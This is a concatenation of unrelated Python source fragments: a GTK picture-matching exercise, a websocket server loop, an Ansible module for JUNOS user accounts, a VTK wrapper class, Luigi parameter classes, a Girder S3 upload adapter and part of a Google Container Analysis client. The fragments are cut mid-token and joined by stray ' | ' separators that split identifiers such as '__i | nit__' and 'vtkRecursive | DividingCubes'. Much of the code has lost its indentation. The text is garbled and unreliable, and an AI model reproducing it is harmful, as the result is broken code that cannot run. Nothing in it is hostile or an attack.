imageContainer = gtk.Image()
pixbuf = gtk.gdk.pixbuf_new_from_file(payload).scale_simple(IMAGES_SCALE[0], IMAGES_SCALE[1], 2)
imageContainer.set_from_pixbuf(pixbuf)
eventBox.add(imageContainer)
eventBox.modify_ | bg(gtk.STATE_NORMAL, eventBox.get_colormap().alloc_color('white'))
if typePayload == "letter":
letterLabel = gtk.Label(payload)
if len(payload) <= 8:
letterLabel.modify_font(pango.FontDescription(FONT_DESCRIPTION_BI | G))
else:
letterLabel.modify_font(pango.FontDescription(FONT_DESCRIPTION_MEDIUM))
eventBox.add(letterLabel)
eventBox.modify_bg(gtk.STATE_NORMAL, eventBox.get_colormap().alloc_color('white'))
return eventBox
def selectFirtImage(self, firstEvenBox):
availableColour = self.getAvailableSelectionColour()
self.changeBackgroundColour(firstEvenBox, availableColour['colour'])
self.setSelectionStateColour(self.optionsSelectionState, 0, availableColour)
self.currentOptionSelected = 0
frameImageSelected = firstEvenBox.get_parent()
self.fakeSelection(frameImageSelected)
def disorderCorrespondences(self, items):
self.mainWindows.getLogger().debug("Inside to disorderCorrespondences")
optionsList = [None]*len(items)
correspondencesList = [None]*len(items)
indexsList = range(len(items))
originalList = copy.copy(indexsList)
self.mainWindows.getLogger().debug(originalList)
self.mainWindows.getLogger().debug(indexsList)
random.shuffle(indexsList)
while( originalList == indexsList and len(items) > 1):
self.mainWindows.getLogger().debug("Inside to while...")
random.shuffle(indexsList)
self.mainWindows.getLogger().debug(originalList)
self.mainWindows.getLogger().debug(indexsList)
for index, item in enumerate(items):
optionsList[index] = {"option":{"type":item.option.type, "value":item.option.value}, \
"indexPair": indexsList[index]}
correspondencesList[indexsList[index]] = ( {"correspondence":{"type":item.correspondence.type,
"value":item.correspondence.value}, "indexPair": index} )
return (optionsList, correspondencesList)
def checkCompletedExercise(self):
result = True
for index,imageSelectionState in enumerate( self.optionsSelectionState ):
if (imageSelectionState['selected'] != imageSelectionState['pair']) or \
(self.correspondencesSelectionState[index]['selected'] != self.correspondencesSelectionState[index]['pair']) :
result = False
break
if result:
self.exerciseCompleted = True
self.mainWindows.exerciseCompletedCallBack()
def setAllAvailableSelectionColour(self):
for colour in self.COLOURS_ASSOCIATION:
colour['available'] = True
def getAvailableSelectionColour(self):
response = None
for colour in self.COLOURS_ASSOCIATION:
if colour['available']:
response = colour
break
return response
def setAvailableColour(self, colour):
for currentColour in self.COLOURS_ASSOCIATION:
if currentColour['colour'] == colour['colour']:
currentColour['available'] = True
break
def setUnavailableColour(self, colour):
for currentColour in self.COLOURS_ASSOCIATION:
if currentColour['colour'] == colour['colour']:
currentColour['available'] = False
break
    def imageSelectedCallBack(self, imageEventBox, *args):
        """Click handler for an option image: track and highlight the selection.

        Updates last/current selection indexes, reverts the highlight of an
        abandoned previous selection, claims a colour for a new one, and
        finally checks whether the exercise is complete.
        """
        frameImageSelected = imageEventBox.get_parent()
        vBoxImages = imageEventBox.get_parent().get_parent()
        allImagesFrames = vBoxImages.get_children()
        indexImageSelected = vBoxImages.child_get_property(frameImageSelected, "position")
        self.lastOptionSelected = self.currentOptionSelected
        self.currentOptionSelected = indexImageSelected
        vBoxPairs = args[1]
        '''Se des-selecciona el par selecciondo previamente'''
        # Un-select the previously selected correspondence, if any.
        if self.currentCorrespondenceSelected != -1:
            framePairSelected = vBoxPairs.get_children()[self.currentCorrespondenceSelected]
            self.fakeUnselection(framePairSelected)
        # If the last selected image was never associated, restore its
        # white background and clear its recorded colour.
        if self.lastOptionSelected != -1 and self.optionsSelectionState[self.lastOptionSelected]['selected'] == -1:
            lastImageEvenBoxSelected = allImagesFrames[self.lastOptionSelected].get_children()[0]
            self.changeBackgroundColour(lastImageEvenBoxSelected, "white")
            self.setSelectionStateColour(self.optionsSelectionState, self.lastOptionSelected, None)
        # If no association exists yet, claim the next available colour.
        if self.optionsSelectionState[indexImageSelected]['selected'] == -1:
            colorAvailable = self.getAvailableSelectionColour()
            self.changeBackgroundColour(imageEventBox, colorAvailable['colour'])
            self.setSelectionStateColour(self.optionsSelectionState, indexImageSelected, colorAvailable)
        # Update frame borders to reflect the new selection.
        lastFrameImageSelected = allImagesFrames[self.lastOptionSelected]
        self.fakeUnselection(lastFrameImageSelected)
        self.fakeSelection(frameImageSelected)
        # Check whether the exercise is now complete.
        self.checkCompletedExercise()
def pairSelectedCallBack(self, pairEventBox, *args):
vBoxImages = args[1]
allFramesImages = vBoxImages.get_children()
framePairSelected = pairEventBox.get_parent()
vBoxPairs = framePairSelected.get_parent()
allPairFrames = vBoxPairs.get_children()
indexPairSelected = vBoxPairs.child_get_property(framePairSelected, "position")
self.lastCorrespondenceSelected = self.currentCorrespondenceSelected
self.currentCorrespondenceSelected = indexPairSelected
lastPairSelectionState = None
self.mainWindows.getLogger().debug( self.correspondencesSelectionState )
if self.lastCorrespondenceSelected != -1:
lastPairSelectionState = self.correspondencesSelectionState[self.lastCorrespondenceSelected]
pairIndexCurrentImageSelected = -1
imageEventBoxCurremtSelected = None
if self.currentOptionSelected != -1:
pairIndexCurrentImageSelected = self.optionsSelectionState[self.currentOptionSelected]['selected']
imageEventBoxCurremtSelected = self.optionsSelectionState[self.currentOptionSelected]['colour']
pairEventBoxCurrentImageSelected = None
if self.currentOptionSelected != -1 and pairIndexCurrentImageSelected != -1:
|
#!/usr/bin/env python
import sys
import time
import socket
import threading
import Queue
import ConfigParser
import logging as log
from connection import *
from connectionManager import *
log.basicConfig(level=log.DEBUG, stream=sys.stderr)
#Dynamically instantiate an instance of an Application-derived class from a module
#The module must provide an Instantiate() method
def InstantiateApplication(moduleName, *classArgs):
    """Import `moduleName` and build its application object.

    The module must expose an Instantiate() factory; `classArgs` are
    forwarded to it. Returns the created instance.
    """
    loadedModule = __import__(moduleName)
    log.info("InstantiateApplication - Module: " + repr(loadedModule))
    appInstance = loadedModule.Instantiate(*classArgs)
    log.info(repr(appInstance))
    return appInstance
#
#MAIN
#
if __name__ == "__main__":
    # Load server settings (port, backlog size) from config.txt.
    log.info('Loading configuration info')
    config = ConfigParser.ConfigParser()
    config.read('config.txt')
    port = config.getint('Server', 'Port')
    connectionQueueSize = config.getint('Server', 'ConnectionQueueSize')
    #Start applications
    log.info('Loading Applications...')
    applications = {}
    #Admin app
    adminApp = InstantiateApplication('AdminApplication', 'admin')
    applications['/'] = adminApp
    # NOTE(review): Thread(...).start() returns None, so adminAppThread is
    # always None; the call is kept only for its side effect of starting
    # the thread.
    adminAppThread = threading.Thread(target=adminApp.Run).start()
    #Dynamically load applications specified in config.txt
    applicationList = config.items('Applications')
    for application in applicationList:
        appModuleName = application[1]
        appInstanceName = application[0]
        log.info('\tLoading instance of application %s as %s' % (appModuleName, appInstanceName))
        applicationInstance = InstantiateApplication(appModuleName, appInstanceName)
        applications['/' + appInstanceName] = applicationInstance
        # NOTE(review): same Thread(...).start() pattern; variable is None.
        applicationThread = threading.Thread(target=applicationInstance.Run).start()
    log.info("Applications Loaded:")
    log.info(repr(applications))
    #done with config
    del config
    # Listening TCP socket; SO_REUSEADDR allows quick restarts.
    log.info('Starting web socket server')
    serverSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    serverSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    serverSocket.bind( ('', port) )
    serverSocket.listen(connectionQueueSize)
    del port
    del connectionQueueSize
    #Start connection manager
    connectionManager = ConnectionManager()
    connectionManagerThread = threading.Thread(target=connectionManager.Run).start()
    #Accept clients: route each new connection to the application that
    #matches its requested path, or close it.
    try:
        while 1:
            log.info('Waiting to accept client connection...')
            clientSocket, clientAddress = serverSocket.accept()
            try:
                log.info('Got client connection from %s' % (repr(clientAddress)))
                connection = Connection(clientSocket, clientAddress)
                log.info('Client %s requested %s application' % (repr(clientAddress), connection.ApplicationPath))
                if connection.ApplicationPath in applications:
                    requestedApp = applications[connection.ApplicationPath]
                    log.info('Client %s requested app: %s ' % (repr(clientAddress), repr(requestedApp)))
                    if requestedApp.AddClient(connection) == True:
                        connectionManager.AddConnection(connection)
                    else:
                        connection.Close()
                        connection = None
                else:
                    log.info("Client %s requested an unknown Application. Closing connection." % repr(clientAddress))
                    connection.Close()
                    connection = None
            except Exception as ex:
                # NOTE(review): 'Execption' typo is in an emitted log string,
                # left untouched here.
                log.info('Execption occurred while attempting to establish client connection from %s.' % repr(clientAddress))
                log.info(repr(ex))
    except Exception as ex:
        log.info('Server encountered an unhandled exception.')
        log.info(repr(ex))
    log.info('Web socket server closing.')
|
r JUNOS devices
description:
- This module manages locally configured user accounts on remote
network devices running the JUNOS operating system. It provides
a set of arguments for creating, removing and updating locally
defined accounts
extends_documentation_fragment: junos
options:
aggregate:
description:
- The C(aggregate) argument defines a list of users to be configured
on the remote device. The list of users will be compared against
the current users and only changes will be added or removed from
the device configuration. This argument is mutually exclusive with
the name argument.
version_added: "2.4"
required: False
default: null
aliases: ['users', 'collection']
name:
description:
- The C(name) argument defines the username of the user to be created
on the system. This argument must follow appropriate usernaming
conventions for the target device running JUNOS. This argument is
mutually exclusive with the C(aggregate) argument.
required: false
default: null
full_name:
description:
- The C(full_name) argument provides the full name of the user
account to be created on the remote device. This argument accepts
any text string value.
required: false
default: null
role:
description:
- The C(role) argument defines the role of the user account on the
remote system. User accounts can have more than one role
configured.
required: false
choices: ['operator', 'read-only', 'super-user', 'unauthorized']
sshkey:
description:
- The C(sshkey) argument defines the public SSH key to be configured
for the user account on the remote system. This argument must
be a valid SSH key
required: false
default: null
purge:
description:
- The C(purge) argument instructs the module to consider the
users definition absolute. It will remove any previously configured
users on the device with the exception of the current defined
set of aggregate.
required: false
default: false
state:
description:
- The C(state) argument configures the state of the user definitions
as it relates to the device operational configuration. When set
to I(present), the user should be configured in the device active
configuration and when set to I(absent) the user should not be
in the device active configuration
required: false
default: present
choices: ['present', 'absent']
active:
description:
- Specifies whether or not the configuration is active or deactivated
default: True
choices: [True, False]
version_added: "2.4"
requirements:
- ncclient (>=v0.5.2)
notes:
- This module requires the netconf system service be enabled on
the remote device being managed.
- Tested against vSRX JUNOS version 15.1X49-D15.4, vqfx-10000 JUNOS Version 15.1X53-D60.4.
- Recommended connection is C(netconf). See L(the Junos OS Platform Options,../network/user_guide/platform_junos.html).
- This module also works with C(local) connections for legacy playbooks.
"""
EXAMPLES = """
- name: create new user account
junos_user:
name: ansible
role: super-user
sshkey: "{{ lookup('file', '~/.ssh/ansible.pub') }}"
state: present
- name: remove a user account
junos_user:
name: ansible
state: absent
- name: remove all user accounts except ansible
junos_user:
aggregate:
- name: ansible
purge: yes
- name: Create list of users
junos_user:
aggregate:
- {name: test_user1, full_name: test_user2, role: operator, state: present}
- {name: test_user2, full_name: test_user2, role: read-only, state: present}
- name: Delete list of users
junos_user:
aggregate:
- {name: test_user1, full_name: test_user2, role: operator, state: absent}
- {name: test_user2, full_name: test_user2, role: read-only, state: absent}
"""
RETURN = """
diff.prepared:
description: Configuration difference before and after applying change.
returned: when configuration is changed and diff option is enabled.
type: string
sample: >
[edit system login]
+ user test-user {
+ uid 2005;
+ class read-only;
+ }
"""
from functools import partial
from copy import deepcopy
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.network.common.utils import remove_default_spec
from ansible.module_utils.network.junos.junos import junos_argument_spec, get_connection
from ansible.module_utils.network.junos.junos import commit_configuration, discard_changes
from ansible.module_utils.network.junos.junos import load_config, locked_config
from ansible.module_utils.six import iteritems
try:
from lxml.etree import Element, SubElement, tostring
except ImportError:
from xml.etree.ElementTree import Element, SubElement, tostring
# Login classes Junos accepts for a user's 'class' configuration node.
ROLES = ['operator', 'read-only', 'super-user', 'unauthorized']
# Reuse one persistent NETCONF connection across module invocations.
USE_PERSISTENT_CONNECTION = True
def handle_purge(module, want):
    """Build XML that deletes every configured login user not in ``want``.

    Fetches the device's current configuration over the module connection
    and, for each login user that is neither in the desired list nor
    'root', appends a <user operation="delete"> node.

    :returns: the <system> element when at least one user is to be
        deleted, otherwise None (implicit).
    """
    want_users = [item['name'] for item in want]
    element = Element('system')
    login = SubElement(element, 'login')
    conn = get_connection(module)
    reply = conn.execute_rpc(tostring(Element('get-configuration')), ignore_warning=False)
    # NOTE(review): .xpath() only exists on lxml elements — with the
    # xml.etree fallback import this would fail; presumably lxml is
    # effectively required here. Confirm against module requirements.
    users = reply.xpath('configuration/system/login/user/name')
    if users:
        for item in users:
            name = item.text
            # Never purge 'root' or any user we still want configured.
            if name not in want_users and name != 'root':
                user = SubElement(login, 'user', {'operation': 'delete'})
                SubElement(user, 'name').text = name
    if element.xpath('/system/login/user/name'):
        return element
def map_obj_to_ele(module, want):
    """Translate the desired user list into a Junos <system><login> XML tree.

    :param module: AnsibleModule; only used to fail when asked to delete
        the 'root' account.
    :param want: list of user dicts with keys name/state/active/role and
        optional full_name/sshkey.
    :returns: an Element rooted at <system>, one <user> node per entry,
        marked with operation 'merge' (present) or 'delete' (absent).
    """
    element = Element('system')
    login = SubElement(element, 'login')
    for item in want:
        if item['state'] != 'present':
            if item['name'] == 'root':
                module.fail_json(msg="cannot delete the 'root' account.")
            operation = 'delete'
        else:
            operation = 'merge'
        user = SubElement(login, 'user', {'operation': operation})
        SubElement(user, 'name').text = item['name']
        if operation == 'merge':
            # Junos marks configuration nodes active/inactive via attributes.
            if item['active']:
                user.set('active', 'active')
            else:
                user.set('inactive', 'inactive')
            if item['role']:
                SubElement(user, 'class').text = item['role']
            if item.get('full_name'):
                SubElement(user, 'full-name').text = item['full_name']
            if item.get('sshkey'):
                auth = SubElement(user, 'authentication')
                ssh_rsa = SubElement(auth, 'ssh-rsa')
                # Was assigned to an unused local `key`; the SubElement
                # call's side effect is all that matters.
                SubElement(ssh_rsa, 'name').text = item['sshkey']
    return element
def get_param_value(key, item, module):
    """Resolve ``key`` from ``item``, falling back to ``module.params``.

    Per-item values are type-checked against the declared argument spec;
    the resolved value is then passed through an optional module-level
    ``validate_<key>`` function when both exist.
    """
    if item.get(key):
        # Value supplied per-item: type-check it against the argument spec.
        expected_type = module.argument_spec[key].get('type', 'str')
        module._CHECK_ARGUMENT_TYPES_DISPATCHER[expected_type](item[key])
        value = item[key]
    else:
        # Fall back to the module-level parameter.
        value = module.params[key]
    validator = globals().get('validate_%s' % key)
    if value and validator:
        validator(value, module)
    return value
def map_params_to_obj(module):
aggregate = module.params['aggregate']
if not aggregate:
if not module.params['name'] and module.params['purge']:
return list()
elif not module.params['name']:
module.fail_json(msg='missing required argument: name')
else:
collection = [{'name': module.params['name']}]
else:
collection = list()
for item in aggregate:
if not isinstance(item, dict):
collection.append({'username': item})
elif 'name' not in item:
module.fail_json(msg='missing required argument: name')
|
# class generated by DeVIDE::createDeVIDEModuleFromVTKObject
from module_kits.vtk_kit.mixins import SimpleVTKClassModuleBase
import vtk
class vtkRecursive | DividingCubes(SimpleVTKClassModuleBase):
def __i | nit__(self, module_manager):
SimpleVTKClassModuleBase.__init__(
self, module_manager,
vtk.vtkRecursiveDividingCubes(), 'Processing.',
('vtkImageData',), ('vtkPolyData',),
replaceDoc=True,
inputFunctions=None, outputFunctions=None)
|
ue
def task_value(self, task_name, param_name):
value = self._get_value(task_name, param_name)
if value == _no_value:
raise MissingParameterException("No default specified")
else:
return value
    def set_global(self, value):
        """
        Set the global (process-wide) override value of this Parameter.

        :param value: the new global value.
        """
        # Name-mangled attribute; cleared again by reset_global().
        self.__global = value
    def reset_global(self):
        """Clear the global override, reverting to the ``_no_value`` sentinel."""
        self.__global = _no_value
    def parse(self, x):
        """
        Parse an individual value from the input.

        The default implementation is an identity (it returns ``x``), but
        subclasses should override this method for specialized parsing. This
        method is called by :py:meth:`parse_from_input` if ``x`` exists. If
        this Parameter was specified with ``is_list=True``, then ``parse`` is
        called once for each item in the list.

        :param str x: the value to parse.
        :return: the parsed value.
        """
        return x  # default impl
def serialize(self, x): # opposite of parse
"""
Opposite of :py:meth:`parse`.
Converts the value ``x`` to a string.
:param x: the value to serialize.
"""
if self.is_list:
return [str(v) for v in x]
return str(x)
def parse_from_input(self, param_name, x, task_name=None):
"""
Parses the parameter value from input ``x``, handling defaults and is_list.
:param param_name: the name of the parameter. This is used for the message in
``MissingParameterException``.
:param x: the input value to parse.
:raises MissingParameterException: if x is false-y and no default is specified.
"""
if not x:
if self.has_task_value(param_name=param_name, task_name=task_name):
return self.task_value(param_name=param_name, task_name=task_name)
elif self.is_bool:
return False
elif self.is_list:
return []
else:
raise MissingParameterException("No value for '%s' (%s) submitted and no default value has been assigned." %
(param_name, "--" + param_name.replace('_', '-')))
elif self.is_list:
return tuple(self.parse(p) for p in x)
else:
return self.parse(x)
def serialize_to_input(self, x):
if self.is_list:
return tuple(self.serialize(p) for p in x)
else:
return self.serialize(x)
def parser_dest(self, param_name, task_name, glob=False, is_without_section=False):
if is_without_section:
if glob:
return param_name
else:
return None
else:
if glob:
return task_name + '_' + param_name
else:
return param_name
def add_to_cmdline_parser(self, parser, param_name, task_name, glob=False, is_without_section=False):
dest = self.parser_dest(param_name, task_name, glob, is_without_section=is_without_section)
if not dest:
return
flag = '--' + dest.replace('_', '-')
description = []
description.append('%s.%s' % (task_name, param_name))
if glob:
description.append('for all instances of class %s' % task_name)
elif self.description:
description.append(self.description)
if self.has_task_value(param_name=param_name, task_name=task_name):
value = self.task_value(param_name=param_name, task_name=task_name)
description.append(" [default: %s]" % (value,))
if self.is_list:
action = "append"
elif self.is_bool:
action = "store_true"
else:
action = "store"
parser.add_argument(flag,
help=' '.join(description),
action=action,
dest=dest)
def parse_from_args(self, param_name, task_name, args, params):
# Note: modifies arguments
dest = self.parser_dest(param_name, task_name, glob=False)
if dest is not None:
value = getattr(args, dest, None)
params[param_name] = self.parse_from_input(param_name, value, task_name=task_name)
def set_global_from_args(self, param_name, task_name, args, is_without_section=False):
# Note: side effects
dest = self.parser_dest(param_name, task_name, glob=True, is_without_section=is_without_section)
if dest is not None:
value = getattr(args, dest, None)
if value:
self.set_global(self.parse_from_input(param_name, value, task_name=task_name))
else: # either False (bools) or None (everything else)
self.reset_global()
class DateHourParameter(Parameter):
    """
    Parameter whose value is a :py:class:`~datetime.datetime` specified to the hour.

    Values are `ISO 8601 <http://en.wikipedia.org/wiki/ISO_8601>`_ formatted
    date-hours, e.g. ``2013-07-10T19`` for July 10, 2013 at 19:00.
    """
    date_format = '%Y-%m-%dT%H'  # ISO 8601 separates date and time with 'T'
    def parse(self, s):
        """Parse ``s`` to a :py:class:`~datetime.datetime` via ``%Y-%m-%dT%H``."""
        # TODO(erikbern): an internal class for arbitrary time intervals
        # (similar to date_interval) might fit better here.
        return datetime.datetime.strptime(s, self.date_format)
    def serialize(self, dt):
        """Format ``dt`` back to ``%Y-%m-%dT%H``; ``None`` becomes ``'None'``."""
        return str(dt) if dt is None else dt.strftime(self.date_format)
class DateMinuteParameter(DateHourParameter):
    """
    Parameter whose value is a :py:class:`~datetime.datetime` specified to the minute.

    A DateMinuteParameter is a `ISO 8601 <http://en.wikipedia.org/wiki/ISO_8601>`_ formatted
    date and time specified to the minute. For example, ``2013-07-10T19H07`` specifies July 10, 2013 at
    19:07. Note the non-standard 'H' separator between hour and minute.
    """
    date_format = '%Y-%m-%dT%HH%M' # ISO 8601 is to use 'T' and 'H'
class DateParameter(Parameter):
    """
    Parameter whose value is a :py:class:`~datetime.date`.

    Accepts dates written as ``YYYY-MM-DD``, e.g. ``2013-07-10`` for
    July 10, 2013.
    """
    def parse(self, s):
        """Parse a ``YYYY-MM-DD`` string into a :py:class:`datetime.date`."""
        pieces = [int(piece) for piece in s.split('-')]
        return datetime.date(*pieces)
class IntParameter(Parameter):
    """
    Parameter whose value is an ``int``.
    """
    def parse(self, s):
        """
        Parses an ``int`` from the string using ``int()``.

        :raises ValueError: if ``s`` is not a valid integer literal.
        """
        return int(s)
class FloatParameter(Parameter):
    """
    Parameter whose value is a ``float``.
    """
    def parse(self, s):
        """
        Parses a ``float`` from the string using ``float()``.

        :raises ValueError: if ``s`` is not a valid float literal.
        """
        return float(s)
class BoolParameter(Parameter):
    """
    A Parameter whose value is a ``bool``.
    """
    def __init__(self, *args, **kwargs):
        """Forward to :py:class:`Parameter`'s constructor with ``is_bool=True``."""
        super(BoolParameter, self).__init__(*args, is_bool=True, **kwargs)
    def parse(self, s):
        """Parse 'true'/'false' (case-insensitive) into a ``bool``.

        :raises KeyError: for any other input.
        """
        lowered = str(s).lower()
        if lowered == 'true':
            return True
        if lowered == 'false':
            return False
        raise KeyError(lowered)
class BooleanParameter(BoolParameter):
    """Deprecated alias kept for backwards compatibility; use BoolParameter."""
    def __init__(self, *args, **kwargs):
        # Emit the deprecation warning at the caller's location.
        warnings.warn(
            'BooleanParameter is deprecated, use BoolParameter instead',
            DeprecationWarning,
            stacklevel=2
        )
        super(BooleanParameter, self).__init__(*args, **kwargs)
class DateIntervalParameter(Parameter):
"""
A Parameter whose value is a :py:class:`~luigi.date_interval.DateI |
cket')
else:
try:
bucket = conn.get_bucket(bucket_name=doc['bucket'],
validate=True)
testKey = boto.s3.key.Key(
bucket=bucket, name='/'.join(
filter(None, (doc['prefix'], 'test'))))
testKey.set_contents_from_string('')
except Exception:
logger.exception('S3 assetstore validation exception')
raise ValidationException('Unable to write into bucket "%s".' %
doc['bucket'], 'bucket')
return doc
    def __init__(self, assetstore):
        """
        :param assetstore: The assetstore to act on.
        """
        super(S3AssetstoreAdapter, self).__init__(assetstore)
        # Precompute boto connection parameters only when explicit
        # credentials are configured on the assetstore document.
        if ('accessKeyId' in self.assetstore and 'secret' in self.assetstore and
            'service' in self.assetstore):
            self.assetstore['botoConnect'] = makeBotoConnectParams(
                self.assetstore['accessKeyId'], self.assetstore['secret'],
                self.assetstore['service'])
    def _getRequestHeaders(self, upload):
        """Headers to sign/send with S3 requests for this upload.

        Marks the object private and records the uploading user id and
        client IP as S3 metadata.
        """
        return {
            'Content-Disposition': 'attachment; filename="%s"' % upload['name'],
            'Content-Type': upload.get('mimeType', ''),
            'x-amz-acl': 'private',
            'x-amz-meta-uploader-id': str(upload['userId']),
            'x-amz-meta-uploader-ip': str(cherrypy.request.remote.ip)
        }
    def initUpload(self, upload):
        """
        Build the request required to initiate an authorized upload to S3.

        Mutates and returns the ``upload`` document, attaching the S3 key,
        chunking info, and a signed request the client should issue.
        """
        if upload['size'] <= 0:
            # Zero-byte uploads never touch S3; nothing to initiate.
            return upload
        # Random object key, sharded into two 2-hex-char prefix levels.
        uid = uuid.uuid4().hex
        key = '/'.join(filter(None, (self.assetstore.get('prefix', ''),
                              uid[0:2], uid[2:4], uid)))
        path = '/%s/%s' % (self.assetstore['bucket'], key)
        headers = self._getRequestHeaders(upload)
        # Files larger than one chunk use S3 multipart upload (initiated
        # with POST ?uploads); smaller ones go up in a single signed PUT.
        chunked = upload['size'] > self.CHUNK_LEN
        upload['behavior'] = 's3'
        upload['s3'] = {
            'chunked': chunked,
            'chunkLength': self.CHUNK_LEN,
            'relpath': path,
            'key': key
        }
        if chunked:
            upload['s3']['request'] = {'method': 'POST'}
            alsoSignHeaders = {}
            queryParams = {'uploads': None}
        else:
            upload['s3']['request'] = {'method': 'PUT'}
            alsoSignHeaders = {
                'Content-Length': upload['size']
            }
            queryParams = None
        url = self._botoGenerateUrl(
            method=upload['s3']['request']['method'], key=key,
            headers=dict(headers, **alsoSignHeaders), queryParams=queryParams,
            chunkedUpload=chunked)
        upload['s3']['request']['url'] = url
        upload['s3']['request']['headers'] = headers
        return upload
def uploadChunk(self, upload, chunk):
"""
Rather than processing actual bytes of the chunk, this will generate
the signature required to upload the chunk. Clients that do not support
direct-to-S3 upload can pass the chunk via the request body as with
other assetstores, and Girder will proxy the data through to S3.
:param chunk: This should be a JSON string containing the chunk number
and S3 upload ID. If a normal chunk file-like object is passed,
we will send the data to S3.
"""
if isinstance(chunk, six.string_types):
return self._clientUploadChunk(upload, chunk)
else:
return self._proxiedUploadChunk(upload, chunk)
def _clientUploadChunk(self, upload, chunk):
"""
Clients that support direct-to-S3 upload behavior will go through this
method by sending a normally-encoded form string as the chunk parameter,
containing the required JSON info for uploading. This generates the
signed URL that the client should use to upload the chunk to S3.
"""
info = json.loads(chunk)
index = int(info['partNumber']) - 1
length = min(self.CHUNK_LEN, upload['size'] - index * self.CHUNK_LEN)
if 'contentLength' in info and int(info['contentLength']) != length:
raise ValidationException('Expected chunk size %d, but got %d.' % (
length, info['contentLength']))
if length <= 0:
raise ValidationException('Invalid chunk length %d.' % length)
queryParams = {
'partNumber': info['partNumber'],
'uploadId': info['s3UploadId']
}
url = self._botoGenerateUrl(
method='PUT', key=upload['s3']['key'], queryParams=queryParams,
headers={
'Content-Length': length
})
upload['s3']['uploadId'] = info['s3UploadId']
upload['s3']['partNumber'] = info['partNumber']
upload['s3']['request'] = {
'method': 'PUT',
'url': url
}
return upload
def _getBucket(self, validate=True):
conn = botoConnectS3(self.assetstore['botoConnect'])
bucket = conn.lookup(bucket_name=self.assetstore['bucket'],
validate=validate)
if not bucket:
raise Exception('Could not connect to S3 bucket.')
return bucket
    def _proxiedUploadChunk(self, upload, chunk):
        """
        Clients that do not support direct-to-S3 upload behavior will go through
        this method by sending the chunk as a multipart-encoded file parameter
        as they would with other assetstore types. Girder will send the data
        to S3 on behalf of the client.

        :param upload: The upload document; its ``s3`` sub-document is mutated
            to track multipart state (uploadId, keyName, partNumber) and its
            ``received`` byte count is advanced.
        :param chunk: File-like object containing the chunk bytes.
        :returns: The updated upload document.
        :raises ValidationException: If a non-chunked upload's data is shorter
            than the declared size.
        """
        bucket = self._getBucket()
        if upload['s3']['chunked']:
            if 'uploadId' in upload['s3']:
                # Resume the in-progress S3 multipart upload from stored state.
                mp = boto.s3.multipart.MultiPartUpload(bucket)
                mp.id = upload['s3']['uploadId']
                mp.key_name = upload['s3']['keyName']
            else:
                # First chunk: initiate the multipart upload and remember its
                # id/key name so later chunks can resume it.
                mp = bucket.initiate_multipart_upload(
                    upload['s3']['key'],
                    headers=self._getRequestHeaders(upload))
                upload['s3']['uploadId'] = mp.id
                upload['s3']['keyName'] = mp.key_name
                upload['s3']['partNumber'] = 0
            # S3 part numbers are 1-based.
            upload['s3']['partNumber'] += 1
            key = mp.upload_part_from_file(
                chunk, upload['s3']['partNumber'],
                headers=self._getRequestHeaders(upload))
            upload['received'] += key.size
        else:
            # Single-request upload: write the whole object in one shot.
            key = bucket.new_key(upload['s3']['key'])
            key.set_contents_from_file(chunk,
                                       headers=self._getRequestHeaders(upload))
            if key.size < upload['size']:
                # A short non-chunked upload is unusable; remove the partial
                # object rather than leaving garbage in the bucket.
                bucket.delete_key(key)
                raise ValidationException('Uploads of this length must be sent '
                                          'in a single chunk.')
            upload['received'] = key.size
        return upload
def requestOffset(self, upload):
if upload['received'] > 0:
# This is only set when we are proxying the data to S3
return upload['received']
if upload['s3']['chunked']:
raise ValidationException(
'You should not call requestOffset on a chunked direct-to-S3 '
'upload.')
headers = self._getRequestHeaders(upload)
url = self._botoGenerateUrl(method='PUT', key=upload['s3']['key'],
headers=headers)
return {
'method': 'PUT',
'url': url,
'headers': headers,
'offset': 0
}
def finalizeUpload(self, upload, file):
if u | pload['size'] <= 0:
return file
file['relpath'] = upload['s3']['relpath']
file['s3Key'] = upload['s3']['key']
if upload['s3 | ']['chunked']:
if upload['received'] > 0:
# We proxied the data to S3
bucket = self._getBucket()
mp = boto.s3.multipart.MultiPartUpload(bucket)
mp.id = upload['s3' |
This argument is mutually exclusive with providing a
transport instance to ``transport``; doing so will raise
an exception.
client_config (dict): DEPRECATED. A dictionary of call options for
each method. If not specified, the default configuration is used.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
client_options (Union[dict, google.api_core.client_options.ClientOptions]):
Client options used to set user | options on the client. API Endpoint
should be set through client_options.
"""
# Raise deprecation warnings for things we want to go away.
if client_config is not None:
warnings.warn(
"The `client_config` argument is deprecated.",
PendingDeprecationWarning,
stacklevel=2,
)
else:
client_config = container_analysis_client_config.config
if channel:
| warnings.warn(
"The `channel` argument is deprecated; use " "`transport` instead.",
PendingDeprecationWarning,
stacklevel=2,
)
api_endpoint = self.SERVICE_ADDRESS
if client_options:
if type(client_options) == dict:
client_options = google.api_core.client_options.from_dict(
client_options
)
if client_options.api_endpoint:
api_endpoint = client_options.api_endpoint
# Instantiate the transport.
# The transport is responsible for handling serialization and
# deserialization and actually sending data to the service.
if transport:
if callable(transport):
self.transport = transport(
credentials=credentials,
default_class=container_analysis_grpc_transport.ContainerAnalysisGrpcTransport,
address=api_endpoint,
)
else:
if credentials:
raise ValueError(
"Received both a transport instance and "
"credentials; these are mutually exclusive."
)
self.transport = transport
else:
self.transport = container_analysis_grpc_transport.ContainerAnalysisGrpcTransport(
address=api_endpoint, channel=channel, credentials=credentials
)
if client_info is None:
client_info = google.api_core.gapic_v1.client_info.ClientInfo(
gapic_version=_GAPIC_LIBRARY_VERSION
)
else:
client_info.gapic_version = _GAPIC_LIBRARY_VERSION
self._client_info = client_info
# Parse out the default settings for retry and timeout for each RPC
# from the client configuration.
# (Ordinarily, these are the defaults specified in the `*_config.py`
# file next to this one.)
self._method_configs = google.api_core.gapic_v1.config.parse_method_configs(
client_config["interfaces"][self._INTERFACE_NAME]
)
# Save a dictionary of cached API call functions.
# These are the actual callables which invoke the proper
# transport methods, wrapped with `wrap_method` to add retry,
# timeout, and the like.
self._inner_api_calls = {}
def get_grafeas_client(self):
"""Returns an equivalent grafeas client.
Returns:
A :class:`~grafeas.grafeas_v1.GrafeasClient` instance.
"""
grafeas_transport = grafeas_grpc_transport.GrafeasGrpcTransport(
self.SERVICE_ADDRESS, self.transport._OAUTH_SCOPES
)
